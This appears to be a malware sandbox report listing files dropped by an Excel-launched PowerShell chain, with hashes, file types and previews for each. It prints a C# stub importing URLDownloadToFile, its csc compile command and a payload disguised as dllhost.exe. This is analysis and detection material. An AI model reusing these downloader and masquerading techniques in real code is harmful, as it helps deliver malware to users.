                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.0906579417448854
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycbak7Ynqq3UPN5Dlq5J:+RI+ycuZhNoakSEPNnqX
                                                                            MD5:5B44818A2DDC174024A1A2F986AA779C
                                                                            SHA1:A502F72A0903E5263EB85F08EE14EB636EFA2E3D
                                                                            SHA-256:5C6931DA4A84E843DCAF0EAE66B57AC2EBBA62543812BA438E69402841F491C6
                                                                            SHA-512:E625D70668F875AF23C86BE7BA72EF5EF355FA5D0D24FDEF3D15EB199E3C82A87D654236FB70DA6EBDBCFFAF04AFD5A722C6B1B6EA097D39FFB313A7EFD6B1BE
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                            C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                            Category:dropped
                                                                            Size (bytes):474
                                                                            Entropy (8bit):3.762186518164636
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuWdxFPMAQXReKJ8SRHy4Hsyb4CUQ/aWQy:V/DTLDfuwuXfHU8cy
                                                                            MD5:ED8B0B366B8FD7BDF35FCDDB6A6FC768
                                                                            SHA1:F333BE6ECEC2AC5315DC3CB28FFE6202E6C3E142
                                                                            SHA-256:F179DBF6F56665E7020A3CF42A5150AED8A15253CCBCF368CDC526C88D90D99B
                                                                            SHA-512:1ACE461D8AF56F8002E38EB8274F86C026ABFBFBD851C93D878D9A211EE727005B98C7236F43E1497C0A654BA45DC87AB6ED3EC49C77B3A3013E771381F523CE
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IksntLgmSqt.{. public class ss. {. [DllImport("URLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FwwK,string DHAHgBDF,string BHs,uint TW,IntPtr puzamEd);.. }..}.

                                                                            C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.1912270101390865
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fcMBn0zxs7+AEszIP23fcMDHn:p37Lvkmb6Kz0An0WZEo02n
                                                                            MD5:039730D2CD280C0E4E71017A9DD1515D
                                                                            SHA1:A80F3122E1CBE77464D1E3ACEFC5F0A1BB9E14A1
                                                                            SHA-256:DB3E3A5B00DE0B3B170CCDD50AAB956DCDA79561512FCAD2E18FC6F087E5AF45
                                                                            SHA-512:4C367AC592013356F3B7CE8984F01A9EB3E19D34069762B9182A4477E1F3B9B48DEA664C63559F40BE25943CB01E6D50DA054910EBCB2E0394CD134202B38DA8
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs"

                                                                            C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.818648307118402
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGScEPBG5eM7p8s8SgkCMqz9RPAc4tkZfhAkqhkWI+ycuZhNoakSEPNnq:6ksM+DMo9LJhAkEH1uloa3Eq
                                                                            MD5:FE6C55C53DD220EEC135C02415641360
                                                                            SHA1:85E96783F68817D90E8092FF66FEA8B050B8C373
                                                                            SHA-256:83585AA42AA44B58D57561546FCD1530E628AD01514C05B98CC35493F8DF5B8B
                                                                            SHA-512:0729DE0C03C3D0970CBE94633ADED207459E490FE3648EA1C263996DDB9C910BC22594E7AE09D97FF7DBB25006B617DE07FAD96E91C01F875AD5F8806D341DF0
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.sm

                                                                            C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.out

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):866
                                                                            Entropy (8bit):5.322229052720327
                                                                            Encrypted:false
                                                                            SSDEEP:24:AId3ka6KzFEoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
                                                                            MD5:CF6AEDC19818156F769B77F70B5CAB34
                                                                            SHA1:EA7C74184D94074459A68B739ECB338B94FAF2AD
                                                                            SHA-256:A5ABBFCDBF4E3578A87F81B519DE9AAD652C7392792E19F72613FFC9877A09D9
                                                                            SHA-512:778B8F9116CCD2261F1E578CD2AA100EA0A3BD83C94D3D55273975F8AA6C658DB2045398933B783595AA44FFC6BCE738F5DCFB5EF8C1804A0302CD2B0E3AD5B4
                                                                            Malicious:false
                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                            C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\vtxzj5fd.fia.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\w3yxibzn.2ob.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\wm0prvst.ulj.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\wmp1pwio.ywf.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\ywcv3dyy.x14.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\zivderee.t2i.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\zt2rhuiy.1xs.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\~DF8616F0049FEDF9F2.TMP

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\~DFA90634FEFD6052EC.TMP

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\~DFDF9B9914A7405FA0.TMP

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LS6LA5XBHLPL7UUT4487.temp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YS2VA87AF2SC5704UN33.temp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF6b7df7.TMP (copy)

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....>Y.>. PROGRA~3..D.......:..>Y.>*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WE...Programs..f.......:...WE.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                                                            C:\Users\user\AppData\Roaming\dllhost.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):990768
                                                                            Entropy (8bit):6.298838855552093
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                                                            MD5:450228D72F9F726B645C55BBBC6DB905
                                                                            SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                                                            SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                                                            SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:ASCII text, with very long lines (3095), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):53853
                                                                            Entropy (8bit):5.3041850938045645
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Yb2DFjNKjwJJCwZuTEaiwLAm7C24yWjc2:YSrvJEwZtwM6qg2
                                                                            MD5:552ED0904239D64DB1895620B38DC799
                                                                            SHA1:8A6A6C6EFD31B04C716CDE1783B45783F2843E20
                                                                            SHA-256:D4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514
                                                                            SHA-512:21F283AC39223437470036EC08EB01BF40C4A0C45EA5B94BB4D902CF66923DB4D14641CE68370D240AB2B213527552DFDE13EB1FF4B21A0BBF0C1EE6AED7ADE7
                                                                            Malicious:true
